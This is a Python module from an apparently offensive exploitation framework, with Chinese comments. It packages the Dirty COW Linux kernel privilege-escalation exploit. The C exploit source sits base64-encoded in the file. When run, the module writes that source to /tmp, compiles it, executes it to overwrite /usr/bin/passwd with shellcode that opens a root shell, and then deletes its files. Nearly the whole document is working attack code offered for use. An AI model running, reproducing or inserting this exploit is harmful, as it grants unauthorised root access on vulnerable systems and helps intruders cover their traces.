#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os

try:
    from core.log import Log
    from core.log import color
except Exception as e:
    import sys
    sys.path.append("../../core/log")
    from Log import Log
    from Log import color

class Exploit:
    # 定义该漏洞利用的配置信息
    # 备注:
    #	necessity 表示该参数是否必须配置
    #	default 为该参数的默认值
    config = {
    }

    code = '''
        I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHN5cy9tbWFu
        Lmg+CiNpbmNsdWRlIDxmY250bC5oPgojaW5jbHVkZSA8cHRocmVhZC5oPgojaW5jbHVkZSA8c3Ry
        aW5nLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KCnZvaWQgKm1hcDsKaW50IGY7CmludCBzdG9wID0g
        MDsKc3RydWN0IHN0YXQgc3Q7CmNoYXIgKm5hbWU7CnB0aHJlYWRfdCBwdGgxLHB0aDIscHRoMzsK
        CmNoYXIgc3VpZF9iaW5hcnlbXSA9ICIvdXNyL2Jpbi9wYXNzd2QiOwoKLyoKICogKiAkIG1zZnZl
        bm9tIC1wIGxpbnV4L3g2NC9leGVjIENNRD0iZWNobyAwID4gL3Byb2Mvc3lzL3ZtL2RpcnR5X3dy
        aXRlYmFja19jZW50aXNlY3MmJmNwIC1mIC90bXAvYmFrIC91c3IvYmluL3Bhc3N3ZCYmL2Jpbi9i
        YXNoIiBQcmVwZW5kU2V0dWlkPVRydWUgLWYgZWxmIHwgeHhkIC1pCiAqICovCnVuc2lnbmVkIGNo
        YXIgc2NbXSA9IHsKICAweDdmLCAweDQ1LCAweDRjLCAweDQ2LCAweDAyLCAweDAxLCAweDAxLCAw
        eDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4
        MDIsIDB4MDAsIDB4M2UsIDB4MDAsIDB4MDEsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHg3OCwgMHgw
        MCwgMHg0MCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHg0MCwgMHgwMCwgMHgwMCwg
        MHgwMCwKICAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw
        eDAwLCAweDAwLCAweDAwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4NDAsIDB4
        MDAsIDB4MzgsIDB4MDAsIDB4MDEsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHgwMCwgMHgwMCwgMHgw
        MCwgMHgwMCwgMHgwMSwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwNywgMHgwMCwgMHgwMCwgMHgwMCwK
        ICAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw
        eDAwLCAweDQwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4
        NDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHgwMiwgMHgwMSwgMHgwMCwgMHgw
        MCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHg4YywgMHgwMSwgMHgwMCwgMHgwMCwKICAweDAw
        LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDEwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw
        eDAwLCAweDAwLAogIDB4NDgsIDB4MzEsIDB4ZmYsIDB4NmEsIDB4NjksIDB4NTgsIDB4MGYsIDB4
        MDUsIDB4NmEsIDB4M2IsIDB4NTgsIDB4OTksCiAgMHg0OCwgMHhiYiwgMHgyZiwgMHg2MiwgMHg2
        OSwgMHg2ZSwgMHgyZiwgMHg3MywgMHg2OCwgMHgwMCwgMHg1MywgMHg0OCwKICAweDg5LCAweGU3
        LCAweDY4LCAweDJkLCAweDYzLCAweDAwLCAweDAwLCAweDQ4LCAweDg5LCAweGU2LCAweDUyLCAw
        eGU4LAogIDB4NWIsIDB4MDAsIDB4MDAsIDB4MDAsIDB4NjUsIDB4NjMsIDB4NjgsIDB4NmYsIDB4
        MjAsIDB4MzAsIDB4MjAsIDB4M2UsCiAgMHgyMCwgMHgyZiwgMHg3MCwgMHg3MiwgMHg2ZiwgMHg2
        MywgMHgyZiwgMHg3MywgMHg3OSwgMHg3MywgMHgyZiwgMHg3NiwKICAweDZkLCAweDJmLCAweDY0
        LCAweDY5LCAweDcyLCAweDc0LCAweDc5LCAweDVmLCAweDc3LCAweDcyLCAweDY5LCAweDc0LAog
        IDB4NjUsIDB4NjIsIDB4NjEsIDB4NjMsIDB4NmIsIDB4NWYsIDB4NjMsIDB4NjUsIDB4NmUsIDB4
        NzQsIDB4NjksIDB4NzMsCiAgMHg2NSwgMHg2MywgMHg3MywgMHgyNiwgMHgyNiwgMHg2MywgMHg3
        MCwgMHgyMCwgMHgyZCwgMHg2NiwgMHgyMCwgMHgyZiwKICAweDc0LCAweDZkLCAweDcwLCAweDJm
        LCAweDYyLCAweDYxLCAweDZiLCAweDIwLCAweDJmLCAweDc1LCAweDczLCAweDcyLAogIDB4MmYs
        IDB4NjIsIDB4NjksIDB4NmUsIDB4MmYsIDB4NzAsIDB4NjEsIDB4NzMsIDB4NzMsIDB4NzcsIDB4
        NjQsIDB4MjYsCiAgMHgyNiwgMHgyZiwgMHg2MiwgMHg2OSwgMHg2ZSwgMHgyZiwgMHg2MiwgMHg2
        MSwgMHg3MywgMHg2OCwgMHgwMCwgMHg1NiwKICAweDU3LCAweDQ4LCAweDg5LCAweGU2LCAweDBm
        LCAweDA1Cn07CnVuc2lnbmVkIGludCBzY19sZW4gPSAyNTg7CgoKdm9pZCAqbWFkdmlzZVRocmVh
        ZCh2b2lkICphcmcpCnsKICAgIGNoYXIgKnN0cjsKICAgIHN0cj0oY2hhciopYXJnOwogICAgaW50
        IGksYz0wOwogICAgZm9yKGk9MDtpPDEwMDAwMDAgJiYgIXN0b3A7aSsrKSB7CiAgICAgICAgICAg
        IGMrPW1hZHZpc2UobWFwLDEwMCxNQURWX0RPTlRORUVEKTsKICAgICAgICB9CiAgICBwcmludGYo
        InRocmVhZCBzdG9wcGVkXG4iKTsKfQoKdm9pZCAqcHJvY3NlbGZtZW1UaHJlYWQodm9pZCAqYXJn
        KQp7CiAgICBjaGFyICpzdHI7CiAgICBzdHI9KGNoYXIqKWFyZzsKICAgIGludCBmPW9wZW4oIi9w
        cm9jL3NlbGYvbWVtIixPX1JEV1IpOwogICAgaW50IGksYz0wOwogICAgZm9yKGk9MDtpPDEwMDAw
        MDAgJiYgIXN0b3A7aSsrKSB7CiAgICAgICAgICAgIGxzZWVrKGYsbWFwLFNFRUtfU0VUKTsKICAg
        ICAgICAgICAgYys9d3JpdGUoZiwgc3RyLCBzY19sZW4pOwogICAgICAgIH0KICAgIHByaW50Zigi
        dGhyZWFkIHN0b3BwZWRcbiIpOwp9Cgp2b2lkICp3YWl0Rm9yV3JpdGUodm9pZCAqYXJnKSB7CiAg
        ICBjaGFyIGJ1ZltzY19sZW5dOwoKICAgIGZvcig7OykgewogICAgICAgICAgICBGSUxFICpmcCA9
        IGZvcGVuKHN1aWRfYmluYXJ5LCAicmIiKTsKCiAgICAgICAgICAgIGZyZWFkKGJ1Ziwgc2NfbGVu
        LCAxLCBmcCk7CgogICAgICAgICAgICBpZihtZW1jbXAoYnVmLCBzYywgc2NfbGVuKSA9PSAwKSB7
        CiAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ZigiJXMgb3ZlcndyaXR0ZW5cbiIsIHN1aWRf
        YmluYXJ5KTsKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAg
        ICAgfQoKICAgICAgICAgICAgZmNsb3NlKGZwKTsKICAgICAgICAgICAgc2xlZXAoMSk7CiAgICAg
        ICAgfQoKICAgIHN0b3AgPSAxOwoKICAgIHByaW50ZigiUG9wcGluZyByb290IHNoZWxsLlxuIik7
        CiAgICBwcmludGYoIkRvbid0IHdvcnJ5LC91c3IvYmluL3Bhc3N3ZCBoYXMgYmVlbiByZXN0b3Jl
        ZC5cbiIpOwoKICAgIHN5c3RlbShzdWlkX2JpbmFyeSk7Cn0KCmludCBtYWluKGludCBhcmdjLGNo
        YXIgKmFyZ3ZbXSkgewogICAgY2hhciAqYmFja3VwOwoKICAgIHByaW50ZigiRGlydHlDb3cgcm9v
        dCBwcml2aWxlZ2UgZXNjYWxhdGlvblxuIik7CiAgICBwcmludGYoIkJhY2tpbmcgdXAgJXMgdG8g
        L3RtcC9iYWtcbiIsIHN1aWRfYmluYXJ5KTsKCiAgICBhc3ByaW50ZigmYmFja3VwLCAiY3AgJXMg
        L3RtcC9iYWsiLCBzdWlkX2JpbmFyeSk7CiAgICBzeXN0ZW0oYmFja3VwKTsKCiAgICBmID0gb3Bl
        bihzdWlkX2JpbmFyeSxPX1JET05MWSk7CiAgICBmc3RhdChmLCZzdCk7CgogICAgcHJpbnRmKCJT
        aXplIG9mIGJpbmFyeTogJWRcbiIsIHN0LnN0X3NpemUpOwoKICAgIGNoYXIgcGF5bG9hZFtzdC5z
        dF9zaXplXTsKICAgIG1lbXNldChwYXlsb2FkLCAweDkwLCBzdC5zdF9zaXplKTsKICAgIG1lbWNw
        eShwYXlsb2FkLCBzYywgc2NfbGVuKzEpOwoKICAgIG1hcCA9IG1tYXAoTlVMTCxzdC5zdF9zaXpl
        LFBST1RfUkVBRCxNQVBfUFJJVkFURSxmLDApOwoKICAgIHByaW50ZigiUmFjaW5nLCB0aGlzIG1h
        eSB0YWtlIGEgd2hpbGUuLlxuIik7CgogICAgcHRocmVhZF9jcmVhdGUoJnB0aDEsIE5VTEwsICZt
        YWR2aXNlVGhyZWFkLCBzdWlkX2JpbmFyeSk7CiAgICBwdGhyZWFkX2NyZWF0ZSgmcHRoMiwgTlVM
        TCwgJnByb2NzZWxmbWVtVGhyZWFkLCBwYXlsb2FkKTsKICAgIHB0aHJlYWRfY3JlYXRlKCZwdGgz
        LCBOVUxMLCAmd2FpdEZvcldyaXRlLCBOVUxMKTsKCiAgICBwdGhyZWFkX2pvaW4ocHRoMywgTlVM
        TCk7CgogICAgcmV0dXJuIDA7Cn0K
        '''

    def __init__(self):
        pass

    def exploit(self):
        '''
        漏洞利用的核心代码, 在此函数中完成漏洞利用
        '''
        Log.Log.info("Creating source code...")
        with open("/tmp/dirtyc0w.c", "w") as f:
            f.write(self.code.decode("base64"))
        Log.Log.info("Compiling...")
        os.system("gcc -o /tmp/dirtyc0w /tmp/dirtyc0w.c -pthread")
        Log.Log.info("Executing...")
        os.system("/tmp/dirtyc0w")
        Log.Log.info("Cleaning...")
        os.system("rm -rf /tmp/dirtyc0w")
        os.system("rm -rf /tmp/dirtyc0w.c")
        Log.Log.success("Exploit success!")

    def show_options(self):
        '''
        输出该模块的选项信息 (即之前定义的 config)
        由 options 命令触发
        通常不需要改动
        '''
        if len(self.config.keys()) == 0:
            return
        Log.Log.warning("Options\t\tNecessity\t\tDefault")
        Log.Log.warning("-------\t\t---------\t\t-------")
        for key in sorted(self.config.keys()):
            Log.Log.warning("%s\t\t%s\t\t\t%s" % (
                key, self.config[key]["necessity"], self.get_config(key)))

    def set_config(self, key, value):
        '''
        对模块的参数进行修改
        由 set 命令触发
        通常不需要改动
        '''
        if key in self.config.keys():
            self.config[key]["default"] = value
        else:
            Log.Log.error("No such option!")

    def get_config(self, key):
        return self.config[key]["default"]

    def show_info(self):
        '''
        模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等
        该函数在模块被加载的时候自动调用
        需要将其中的信息修改为对应的模块信息
        '''
        Log.Log.info("Name: Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)")
        Log.Log.info("Effected Version: 2.6.22 < 3.9 (x86/x64)")
        Log.Log.info("Author: Robin Verton")
        Log.Log.info("Refer:")
        Log.Log.info("\thttps://www.exploit-db.com/exploits/40616/")

def main():
    '''
    测试用例
    '''
    exploit = Exploit()
    exploit.show_info()
    exploit.show_options()
    exploit.exploit()

if __name__ == "__main__":
    main()
